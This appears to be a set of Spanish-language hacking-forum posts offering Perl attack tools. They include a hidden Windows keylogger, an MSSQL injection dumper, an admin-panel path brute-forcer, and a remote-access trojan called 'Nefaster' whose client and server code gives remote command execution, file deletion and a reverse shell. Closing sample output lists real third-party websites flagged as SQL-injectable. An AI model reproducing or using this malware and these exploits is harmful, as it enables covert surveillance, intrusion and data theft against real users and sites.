my $tengo = 0;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

while (true) {

capture_windows();
capture_keys();

}

sub capture_windows {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow();

if($win1 != $win2){
my $nombre = GetWindowText($win1);
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}

}

sub capture_keys {

my $test1;
my $test2;


capture_windows();

for my $num(0x30..0x39) { #Numbers

capture_windows();

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) { #Words


capture_windows();

if (dame($num)) {


if (dame(0x0d)) {
savefile("logs.txt","\n\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
}
}
}

}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;
}

sub verpar{
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?


Bueno , aca les traigo un programa que los ayudara a listar todos los
procesos y cerrar el que quieran
En esta version podran tener una interfaz grafica

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#Manager (C) Doddy Hackman 2010
#Module neccesary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd

use Win32::Process::List;
use Win32::Process;
use Tk;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

$new = MainWindow->new(-background=>"black");
$new->geometry("250x300+20+20");
$new->resizable(0,0);
$new->title("Manager 0.1");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack();
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"50",-x=>"60");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Close",-activebackground=>"green",-width=>"40",-command=>\&close)->place(-y=>"218");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Refresh",-width=>"40",-activebackground=>"green",-command=>\&refresh)->place(-y=>"240");
$new->Button(-background=>"black",-foreground=>"green",-text=>"About",-width=>"40",-activebackground=>"green",-command=>\&about)->place(-y=>"263");

&refresh;

MainLoop;


sub refresh {

my @pids;
my @procer;
my $limit;

$lists->delete(0.0,"end");

my $new = Win32::Process::List->new(); 
my %process = $new->GetProcesses();
my $limit = -1;
for my $pid (keys %process) {
$limit++;
push (@procer,$process{$pid});
push (@pids,$pid);
}
print "\n\n[+] ".int(@procer)."\n\n";
for my $n(0..$limit) {
print $procer[$n]."\n";
$lists->insert("end",$procer[$n]);
}


}

sub close {

$d = $lists->curselection();

for my $id (@$d) {

my $proceso = $lists->get($id);

my $pida = Win32::Process::List->new();
my @pid = $pida->GetProcessPid($proceso);

Win32::Process::KillProcess(@pid[1],$proceso);
sleep 3;
&refresh();
}
}



sub about {
$about = MainWindow->new(-background=>"black");
$about->title("About");
$about->geometry("150x100+20+20");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack();
$about->Label(-background=>"black",-foreground=>"green")->pack();
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack();
}



# ¿ The End ?



Bueno , aca les traigo una tool en perl para
buscar tablas y columnas con information_schema en MSSQL
Tambien pueden sacar los valores que quieren de las columnas.

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011


use LWP::UserAgent;
use HTTP::Request::Common;

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

sub head {
print q(

@@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@ 
@@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@ 
@@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
                                                                 


);
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
<stdin>;
exit(1);
}

repe();

sub repe {

system("cls");


head();


print "\n\n[Page] : ";
chomp(my $page=<stdin>);

$code = toma($page);

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}

menu:

print q(

##################################

1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit

##################################


);

print "[Opcion] : ";
chomp(my $op=<stdin>);

if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
}

#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");


sub mssql_columns {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_tables {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_data {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub toma {
return $nave->request(GET $_[0])->content;
}


# ¿ The End ?

Bueno es es mi troyano Nefaster , en esta version le arregle varias cosas que pasare a detallar

• Mostrar Informacion
  
  
• Navegador de archivos
  
  
• Cambiar directorio de navegacion
  
• Crear archivo
  
• Borrar archivo
  
• Borrar directorio
  
• Reproducir musica o videos poniendo la ruta en la opcion
  
• Parar reproduccion
  
  
• Abrir lectora de CD
  
• Cerrar lectora de CD
  
• Puertos abiertos
  
• Mensaje
  
• Ejecutar comandos
  
• Esconder barra de tareas
  
• Devolver barra de tareas
  
• Esconder iconos del escritorio
  
• Devolver iconos del escritorio
  
• Administrar procesos con posibilidad de cerrar el que quieran
  
• Reverse Shell si es que quieren ejecutar comandos de forma mas comoda
  
  
  El codigo del cliente es este
  
  
  
  Código (perl) [Seleccionar] Expandir
  #!usr/bin/perl
#Nefester (Cliente) 0.1 By Doddy H


use IO::Socket;
use Cwd;

&menu;

sub head {

system 'cls';

print q(


            E      F                   TT    E       
NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR
NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR
NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R
NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR 
NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R 
NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R
NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                            SS                 R   R 



);

}

sub menu {

&head;

print "[Target] : ";
chomp(my $ip = <STDIN>);



my $socket = new IO::Socket::INET(
PeerAddr => $ip,
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

if ($socket) {
$socket->close;
&menuo($ip);
} else {
print "\n\n[-] Target no infectado\n";
<STDIN>;
&menu;
}

}

sub menuo {

&head;

print "[$_[0]] : Servidor Activado\n\n";
print q(
1 : Informacion
2 : Navegador
3 : Abrir CD
4 : Cerrar CD
5 : Puertos abiertos
6 : Mensaje
7 : CMD
8 : Esconder barra de tareas
9 : Devolver barra de tareas
10 : Esconder iconos
11 : Devolver iconos
12 : Administrar procesos
13 : Reverse Shell
14 : Cambiar IP
15 : Salir


);
print "[Opcion] : ";
chomp(my $opcion = <STDIN>);


if ($opcion eq 1) {
print "\n\n[+] Informacion\n\n";
$re = daryrecibir($_[0],"infor");
if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
print "[Dominio] : $1\n";
print "[Chip] : $2\n";
print "[Version] : $3\n";
print "[Nombre] : $4\n";
print "[OS] : $5\n";
<stdin>;
}
&menuo($_[0]);
}
elsif ($opcion eq 2) {

menu1:
print "\n\n[+] Navegacion de archivos\n\n";
$cwd = daryrecibir($_[0],"getcwd"."\r\n");
print "tengo $cwd\n";
show($_[0],"/");
&menu2;

sub menu2 {
print "\n\n[Opciones]\n\n";
print "1 - Cambiar directorio\n";
print "2 - Crear archivo\n";
print "3 - Borrar archivo\n";
print "4 - Borrar directorio\n";
print "5 - Reproducir musica\n";
print "6 - Parar reproduccion\n";
print "7 - Volver al menu inicial\n\n";
print "[Opcion] : ";
chomp(my $op = <stdin>);

if ($op eq 1) {
print "\n\n[+] Directorio : ";
chomp (my $dir=<stdin>);
$ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
if ($ver=~/ok/ig) {
print "\n\n[+] Directory changed\n\n";
}
show($_[0],$dir);
&menu2;
<stdin>;
}

elsif ($op eq 2) {

print "\n\n[Nombre] : ";
chomp(my $name = <stdin>);
print "\n\n[Contenido] : ";
chomp(my $code = <stdin>);

daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");

print "\n\n[+] Archivo creado \n\n";
<stdin>;
}
elsif ($op eq 3) {
print "\n\n[Archivo a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Archivo Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}

elsif ($op eq 4) {
print "\n\n[Directorio a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Directorio Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}

elsif ($op eq 5) {
print "\n\n[Archivo] : ";
chomp(my $file = <stdin>);
print "\n\n[+] Reproduciendo\n\n";
daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
<stdin>;
}
elsif ($op eq 6) {
print "\n\n[+] Reproduccion detenida\n\n";
daryrecibir($_[0],"pararmusic");
<stdin>;
}
elsif ($op eq 7) {
&menuo($_[0]);
}
else {
show($_[0],"/");
}
goto menu1;
}
}

elsif ($opcion eq 3) {
daryrecibir($_[0],"opencd");
&menuo($_[0]);
}

elsif ($opcion eq 4) {
daryrecibir($_[0],"closedcd");
&menuo($_[0]);
}

elsif ($opcion eq 5) {
print "\n[Puertos Abiertos]\n\n";
$re = daryrecibir($_[0],"porters");
while ($re=~/:(.*?):/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
<stdin>;
&menuo($_[0]);
}
elsif ($opcion eq 6) {
print "\n[Mensaje] : ";
chomp (my $msg = <stdin>);
daryrecibir($_[0],"msgbox $msg");
<stdin>;
&menuo($_[0]);
}
elsif ($opcion eq 7) {

menu:

my $cmd,$re;

print "\n\n>";

chomp(my $cmd= <stdin>);

if ($cmd=~/exit/ig) {
&menuo($_[0]);
}

$re = daryrecibir($_[0],"comando :$cmd:");
print "\n".$re;
goto menu;
&menuo($_[0]);
}
elsif ($opcion eq 8) {
daryrecibir($_[0],"iniciochau");
&menuo($_[0]);
}
elsif ($opcion eq 9) {
daryrecibir($_[0],"iniciovuelve");
&menuo($_[0]);
}
elsif ($opcion eq 10) {
daryrecibir($_[0],"iconochau");
&menuo($_[0]);
}
elsif ($opcion eq 11) {
daryrecibir($_[0],"iconovuelve");
&menuo($_[0]);
}

elsif ($opcion eq 12) {

&reload($_[0]);

sub reload {

my @pro;
my @pids;

my $sockex = new IO::Socket::INET(
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

print $sockex "mostrarpro"."\r\n";
$sockex->read($re,5000);
$sockex->close;

chomp $re;

print "\n\n[+] Procesos encontrados\n\n";

while ($re=~/PROXEC(.*?)PROXEC/ig) {
if ($1 ne "") {
push(@pro,$1);
}
}

while ($re=~/PIDX(.*?)PIDX/ig) {
if ($1 ne "") {
push(@pids,$1);
}
}

$cantidad = int(@pro);

for my $num(1..$cantidad) {
if ($pro[$num] ne "") {
print "\n[+] Proceso : ".$pro[$num]."\n";
print "[+] PIDS : ".$pids[$num]."\n";
}
}

print q(

[Opciones]


1 - Refrescar lista
2 - Cerrar procesos
3 - Volver al menu

);

print "\n[Opcion] :  ";
chomp(my $opc = <stdin>);

if ($opc=~/1/ig) {
&reload($_[0]);
}
elsif($opc=~/2/ig) {
print "\n[+] Write the name of the process : ";
chomp(my $numb = <stdin>);
print "\n[+] Write the PID of the process : ";
chomp(my $pid = <stdin>);
$re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
if ($re=~/ok/ig) {
print "\n\n[+] Proceso cerrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
&reload($_[0]);
}
elsif($opc=~/3/ig) {
&menuo($_[0]);
}
else {
&reload;
}
}
}

elsif ($opcion eq 13) {
print "\n\n[IP] : ";
chomp(my $ip = <stdin>);
print "\n\n[Port] : ";
chomp(my $port = <stdin>);
print "\n\n[+] Connected !!!\n\n";
$re = daryrecibir($_[0],"backshell :$ip:$port:");
}
elsif ($opcion eq 14) {
&menu;
}
elsif ($opcion eq 15) {
exit 1;
}
else {
&menuo;
}
}

sub daryrecibir {

my $sockex = new IO::Socket::INET(
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

print $sockex $_[1]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r";
}

sub show {

my $re = daryrecibir($_[0],"getcwd"."\r\n");
print "\n\n[+] Directorio Actual : $re\n\n";
$re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
print "\n\n[Directorios]\n\n";

while ($re1=~/DIREX(.*?)DIREX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}

print "\n\n[Archivos]\n\n";

while ($re1=~/FILEX(.*?)FILEX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}

}

#
# ¿ The End ?
#

  
  Y el server
  
  
  Código (perl) [Seleccionar] Expandir
  
#!/usr/bin/perl
#Nefester (sERVidor) 0.1 By Doddy H
#Compilar con perl2exe para sacar consola

use IO::Socket;
use Socket;
use Win32;
use Cwd;
use Win32::MediaPlayer;
use Win32::Process::List;
use Win32::Process;
use Win32::API;

use constant SW_HIDE => 0;
use constant SW_SHOWNORMAL => 1;

my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');

$test = new Win32::MediaPlayer;

my $sock = IO::Socket::INET->new(LocalPort => 666,
Listen => 10,
Proto => 'tcp',
Reuse => 1);

print "online\n";

while (my $con = $sock->accept){
$resultado = <$con>;
print "boludo mando : $resultado\n";

if ($resultado=~/msgbox (.*)/ig) {
Win32::MsgBox($1,0,"Mensaje de Dios")
}

if ($resultado=~/backshell :(.*):(.*):/ig) {

my ($ip,$port) = ($1,$2);

print "conectando $ip con $port\n";

$ip =~s/(\s)+$//;
$port =~s/(\s)+$//;

conectar($ip,$port);
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}


}

if ($resultado =~/opencd/ig) {

use Win32::API;

my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127; 
$ventana->Call('set CDAudio door open', $rta, 127, 0);
print $con "ok"."\r\n";
}

if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {

my ($pid,$numb) = ($1,$2);

$pid=~s/(\s)+$//;
$numb=~s/(\s)+$//;

if (Win32::Process::KillProcess($pid,$numb)) {
print $con "ok\r\n";
}
}

if ($resultado =~/closedcd/ig) {

use Win32::API;

my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127; 
$ventana->Call('set CDAudio door closed', $rta, 127, 0);
print $con "ok"."\r\n";
}

if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {

my $filex = $1;

$filex =~s/(\s)+$//;

print getcwd()."/".$filex."\n\n";

if (unlink(getcwd()."/".$filex)) {
print $con "ok\r\n";
}

}



if ($resultado=~/infor/ig) {
print "mando";
use Win32;


my $domain = Win32::DomainName();
my $chip = Win32::GetChipName();
my $version = Win32::GetOSVersion();
my $nombre = Win32::LoginName();
my  $os = Win32::GetOSName();

print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
}


if ($resultado=~/porters/ig) {

use Net::Netstat::Wrapper;

$por = "";
@ports = Net::Netstat::Wrapper->only_port();
for(@ports) {
$por = $por.":".$_;
}
print $con $por."\r\n";
}


if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {

my $cancion = $1;

$cancion =~s/(\s)+$//;

$test->load($cancion);
$test->play;

}

if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {

my $dir = $1;
$dir =~s/(\s)+$//;


if (chdir($dir)) {
print $con "ok\r\n";
}

}

if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {

my $veox = $1;
$veox =~s/(\s)+$//;

if (rmdir(getcwd()."/".$veox)) {
print $con "ok\r\n";
}
}



if ($resultado=~/pararmusic/ig) {
$test->close;
}



if ($resultado=~/dirnow ACATOY(.*)/ig) {

my $real = $1;
chomp $real;

$real =~s/(\s)+$//;

print "real $real\n\n";

my @archivos = coleccionar($real);

for (@archivos) {
print $_."\n";
my $todo = $real."/".$_;

print $todo."\n";

if (-f $todo) {
print $con "FILEX".$_."FILEX"."\r\n";
print "File : ".$_."\n";
}

if (-d $todo) {
print $con "DIREX".$_."DIREX"."\r\n";
print "Dir : ".$_."\n";
}

}
}

sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}

if ($resultado=~/getcwd/ig) {
print "envie ".getcwd()."\n\n";
print $con getcwd()."\r\n";
}


if ($resultado=~/mostrarpro/ig) {


my $new = Win32::Process::List->new(); 
my %process = $new->GetProcesses();
for my $pid (keys %process) {
print $con "PROXEC".$process{$pid}."PROXEC\r\n";
print $con "PIDX".$pid."PIDX\r\n";

}


}

if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
my $name = $1;
my $file = $2;

chomp $name;
chomp $file;

$name =~s/(\s)+$//;
$file =~s/(\s)+$//;

print "name is $name end\n";
print "file is $file end\n";

open FILE,">>".$name;
print FILE $file."\n";
close FILE;
}

if ($resultado=~/comando :(.*):/ig) {
print "llego comando $1\n";
print $resultado;
my $temp = qx($1);
print $con $temp."\r";
}

if ($resultado=~/iniciochau/g) {
inicio_chau("Shell_TrayWnd");
}
if ($resultado=~/iniciovuelve/g) {
inicio_vuelve("Shell_TrayWnd");
} else {
print $resultado;
}
if ($resultado=~/iconovuelve/g) {
icono_vuelve("Program Manager");
}
if ($resultado=~/iconochau/g) {
icono_chau("Program Manager");
}


sub icono_vuelve {
$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_SHOWNORMAL);

}

sub icono_chau {

$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_HIDE);

}

sub inicio_vuelve {
$handlex = $a->Call($_[0],0);
$b->Call($handlex,SW_SHOWNORMAL);

}

sub inicio_chau {

$handlea = $a->Call($_[0],0);
$b->Call($handlea,SW_HIDE);

}


}


# ¿ The End ?




La nueva version de esta herramienta para buscar el panel de administracion

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011

use LWP::UserAgent;

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}

sub head {
print "\n\n-- == Panel Control == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0]);
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?


Hola.

Hoy traigo un programa que eh estado haciendo porque estaba harto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones

* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear


Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE



Ejemplo de uso

Código [Seleccionar] Expandir





@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

